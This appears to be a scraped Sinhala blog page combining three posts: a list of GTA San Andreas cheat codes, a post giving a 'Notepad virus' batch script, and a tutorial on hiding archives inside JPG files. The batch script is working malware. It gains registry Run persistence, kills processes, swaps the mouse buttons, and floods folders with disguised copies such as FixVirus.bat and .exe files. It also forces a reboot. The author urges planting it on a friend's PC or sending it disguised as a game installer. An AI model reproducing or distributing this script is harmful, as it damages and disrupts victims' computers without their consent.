gta san andreas Password


            gta san andreas Password 



LXGIWYL = Weapon Set 1, Thug's Tools
KJKSZPJ = Weapon Set 2, Professional Tools
UZUMYMW = Weapon Set 3, Nutter Tools
HESOYAM = Health, Armor, $250k
OSRBLHH = Increase Wanted Level Two Stars
ASNAEB = Clear Wanted Level
AFZLLQLL = Sunny Weather
ICIKPYH = Very Sunny Weather
ALNSFMZO = Overcast Weather
AUIFRVQS = Rainy Weather
CFVFGMJ = Foggy Weather
YSOHNUL = Faster Clock
PPGWJHT = Faster Gameplay
LIYOAAY = Slower Gameplay
AJLOJYQY = Peds Attack Each Other, Get Golf Club
BAGOWPG = Have a bounty on your head
FOOOXFT = Everyone is armed
AIWPRTON = Spawn Rhino
CQZIJMB = Spawn Bloodring Banger
JQNTDMH = Spawn Rancher
PDNEJOH = Spawn Racecar
VPJTQWV = Spawn Racecar
AQTBCODX = Spawn Romero
KRIJEBR = Spawn Stretch
UBHYZHQ = Spawn Trashmaster
RZHSUEW = Spawn Caddy
CPKTNWT = Blow Up All Cars
XICWMD = Invisible car
PGGOMOY = Perfect Handling
SZCMAWO = Suicide
ZEIIVG = All green lights
YLTEICZ = Aggressive Drivers
LLQPFBN = Pink traffic
IOWDLAC = Black traffic
AFSNMSMW = Boats fly
BTCDBCB = Fat
JYSDSOD = Max Muscle
KVGYZQK = Skinny
ASBHGRB = Elvis is Everywhere
BGLUAWML = Peds Attack You With Weapons, Rocket Launcher
CIKGCGX = Beach Party
MROEMZH = Gang Members Everywhere
BIFBUZZ = Gangs Control the Streets
AFPHULTL = Ninja Theme
BEKKNQV = Slut Magnet
BGKGTJH = Traffic is Cheap Cars
GUSNHDE = Traffic is Fast Cars
RIPAZHA = Cars Fly
JHJOECW = Huge Bunny Hop
JUMPJET = Spawn Hydra
KGGGDKP = Spawn Vortex Hovercraft
JCNRUAD = Smash n' Boom
COXEFGU = All Cars Have Nitro
BSXSGGC = Cars Float Away When Hit
XJVSNAJ = Always Midnight
OFVIAC = Orange Sky 21:00
MGHXYRM = Thunderstorm
CWJXUOC = Sandstorm
LFGMHAL = Mega Jump
BAGUVIX = Infinite Health
CVWKXAM = Infinite Oxygen
AIYPWZQP = Have Parachute
YECGAA = Have Jetpack
AEZAKMI = Never Wanted
LJSPQK = Six Star Wanted Level
IAVENJQ = Mega Punch
AEDUWNV = Never Get Hungry
IOJUFZN = Riot Mode
PRIEBJ = Funhouse Theme
MUNASEF = Adrenaline Mode
WANRLTW = Infinite Ammo, No Reload
OUIQDMW = Full Weapon Aiming While Driving
THGLOJ = Reduced Traffic
FVTMNBZ = Traffic is Country Vehicles
SJMAHPE = Recruit Anyone (9mm)
BMTPWHR = Country Vehicles and Peds, Get Born 2 Truck Outfit
ZSOXFSQ = Recruit Anyone (Rockets)
OGXSDAG = Max Respect
EHIBXQS = Max Sex Appeal
VKYPQCF = Taxis Have Nitrous, L3 Bunny Hop
NCSGDAG = Hitman In All Weapon Stats
VQIMAHA = Max All Vehicle Skill Stats
OHDUDE = Spawn Hunter
AKJJYGLC = Spawn Quad
AMOMHRER = Spawn Tanker Truck
EEGCYXT = Spawn Dozer
URKQSRK = Spawn Stunt Plane
AGBDLCID = Spawn Monster
ROCKETMAN = Jetpack


ASNAEB = Clear Wanted Level

සුපිරිම Notepad Virus ටිකක් හදමුද? 02

සුපිරිම Notepad Virus ටිකක් හදමුද? 02

ඔයාල හැමෝම හොඳින් නේද....? ඔන්න මම එදා දෙනව කිව්ව අනිත් පෝස්ට් එක අරගෙන ආව... හැබැයි ඉතින් මේව දැනගැනීම පිණිස විතරයි හොඳේ ... කාවවත් අමාරුවෙ දාන්නනම් එපා.!
ආ... මම එදා මේව යාලුවට හොරෙන් එයාගෙ පීසී එකේ හන්ගල එයාව බයකරන හැටිත් මම කියලදෙන්නමි කියුවනේ... ඒක ඉස්සෙල්ලම බලමුකො......
Start - All Programs ගිහිල්ල  Startup කියන එක තෝරගෙන Right Click කරල Open කරගන්න. ඊපස්සෙ ඔයා හදාගත්තු වෛරස් එක Copy කරල අර Open කරගත්තු Startup එක මත Past කරන්න. ඊපස්සෙ ඔයා සද්දනැතුව මාරුවෙන්න. එයා ආයෙත් Computer එක On කරපුවහම වෛරස් එක නිකම්ම වැඩ කරනව. කවදහරි එයා ඒ ටික  එතනින් අයින්කරනකම්ම හැමදාව ඒවිදිහට වැඩ කරනව.
මෙන්න අද මම ගෙනාව පට්ටම පට්ට වෛරස් එකක්. මේක ටිකක් බරපතලයි. ඒනිසා ඔයාගෙ පීසී එකේ එහෙම මේක රන් කරන්නනම් එපා. මම වගකියන්නෑ........ ලොකුම ලොකු තරහකාරයෙක් ඉන්නවනම් මොකක්හරි ෆයිල් එකකට දාල (ගේම් එකක සෙටප් එකක් විදිහටවත් ) එයාට යවන්ව.  හැබැයි ඉතින් ඕව මහ පවි වැඩ හොදේ............
මෙන්න කෝඩ් එක

@Echo off
color 4title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nulAttrib +r +h Greatgame.batAttrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.batgoto RIP

මෙ ටික නොට් පැඩ් 1කෙ ගහන්න,ගහලා .bat කියලා සේව් කරන්න...

ඕං එහෙනම් මම ගියා............. ආයෙ දවසක තව ටිකක් දෙන්නම්.. තරහ නැතුව ඉතින් කොමෙන්ටුවකුත් කොටලම යන්න.....




පිංතූරයක් ඇතුලෙ file හංගගන්න දන්නවද?


කොහොමද ඔයාලට...? අදත් මම ආව සුපිරි පෝස්ට් එකක් අරගෙන. පිංතූරයක් ඇතුලෙ file හංගගන්න දන්නවද?  නැත්නමි මම කියලදෙන්නමි.  දැන් වැඩේට බහිමු
ඔක්කොටම කලින් ඔයාගෙ පීසී එකේ Archive Software  එක install කරලද නැත්නමි මේ link එකන් නොමිලේම බාගන්න.
http://software-files-a.cnet.com/s/software/13/79/05/49/wrar510.exe?token=1409280760_0ed9d9f2d3eeb2f7bb4cafbedaacb430&fileName=wrar510.exe
මේ උපකල්පන ටික යොදාගත්තම ලේසි.
පින්තූරෙ නම :image
File එකේ නම: file
Folder එකේ නම: New Folder

පින්තූරෙ හංගන ක්‍රමය                                
මුලින්ම folder එකක් හදා ගෙන ඒක ඇතුලට .JPG කියන format එකේ පින්තුරයත්, හංගන්න ඕනි file එකත් දා ගන්න. (file කීපයක් උනත් කමක් නෑ.) ලේසි තැනක හදා ගන්න. C එකේනම් ගොඩක් හොදයි.

හංගගන්න ඔනෙ file එක උඩ right click කරලා ‘add to Archive’ කියල select කරන්න. file එක compress වෙලා ඒ folder එක ඇතුලෙම පෙනේවි. 

දැන් Start>Run ගිහින් (නැත්නම් windows key +R) cmd කියල type කරලා Enter කරන්න. command prompt window එක පෙනේවි.
ඒකෙදි CD\ කියල type කරලා enter කරන්න.
ඊට පස්සේ ‘cd New folder’ කියල. (New Folder කියන්නෙ පින්තූරය තියන folder එකේ නම.)
C:\New Folder> කියන තැන මේ තියන වචන type කරන්න.

copy /b Image.jpg + File.rar Image.jpg

copy /b ලගට තියෙන්නේ ඔයාලගෙ පින්තූරෙ නම.නම ලිව්වට පස්සෙ space එකක් තිලෙ + ලකුණ දාල space එකක් තියල rar file එකේ නම ලියන්න.ආයිත් space එකක් තියල පින්තූරෙ නම ලියන්න.දැන් enter ඔබන්න.
දැන් බලන්න ගිහින් පින්තූරෙ file size එක වැඩිවෙලා නේද කියල. ඒ කියන්නේ file එක පින්තූරෙ ඇතුලට ගිහින් තියෙන්නේ. ඒ උනාට පින්තූරෙ උඩ click කලාම open වෙන්නෙ පින්තූරෙ විතරයි.

පින්තූරෙ අයින්කරන ක්‍රමය                                

පින්තූරෙ උඩ right click කරලා open with ගිහින් winrar select කලාමfile එක පෙන්නාවි.
open with list එකේ winrar නැත්නම් choose program ගිහින් winrar select කරන්න.

කොහොමද වැඩේ..... පටිටයි නේද...............?
තව පෝස්ටි එකකින් හමුවෙමු. කොමෙන්ටුවක් කොටලම යන්න...................!